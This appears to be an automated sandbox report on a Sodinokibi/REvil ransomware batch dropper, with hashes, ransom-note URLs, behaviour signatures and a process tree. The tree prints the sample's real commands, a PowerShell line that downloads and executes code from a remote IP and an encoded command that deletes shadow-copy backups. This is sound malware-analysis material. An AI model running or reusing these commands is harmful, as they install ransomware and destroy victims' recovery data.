Analysis
-
max time kernel
145s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
55022f44a9c2dac0916e9db3842398df.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
55022f44a9c2dac0916e9db3842398df.bat
Resource
win10v200430
General
-
Target
55022f44a9c2dac0916e9db3842398df.bat
-
Size
219B
-
MD5
07ea4461f7fc0758bb7fb455966df5d9
-
SHA1
2df15ea78ad89a7816a69bab5656274115bed854
-
SHA256
dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1
-
SHA512
b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d
Malware Config
Extracted
http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df
Extracted
C:\32rjr23-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/364473B984C95D99
http://decryptor.cc/364473B984C95D99
Signatures
-
Enumerates connected drives 3 TTPs
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1304 wrote to memory of 1396 1304 cmd.exe powershell.exe PID 1396 wrote to memory of 1100 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1100 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1100 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1100 1396 powershell.exe powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1100 powershell.exe 1100 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1396 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 17 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\CopyMove.dib powershell.exe File opened for modification \??\c:\program files\ExportConfirm.vst powershell.exe File opened for modification \??\c:\program files\MeasureCompare.rtf powershell.exe File opened for modification \??\c:\program files\StartEdit.php powershell.exe File opened for modification \??\c:\program files\UninstallPop.vsdm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\32rjr23-readme.txt powershell.exe File created \??\c:\program files\32rjr23-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupDisconnect.wmx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\32rjr23-readme.txt powershell.exe File opened for modification \??\c:\program files\RedoRegister.mpeg powershell.exe File opened for modification \??\c:\program files\SendSubmit.tif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\32rjr23-readme.txt powershell.exe File created \??\c:\program files (x86)\32rjr23-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertStep.wpl powershell.exe File opened for modification \??\c:\program files\FindUninstall.midi powershell.exe File opened for modification \??\c:\program files\PingSuspend.docx powershell.exe File opened for modification \??\c:\program files\UninstallUnblock.wmv powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ii0lpas68.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeBackupPrivilege 656 vssvc.exe Token: SeRestorePrivilege 656 vssvc.exe Token: SeAuditPrivilege 656 vssvc.exe Token: SeTakeOwnershipPrivilege 1396 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:656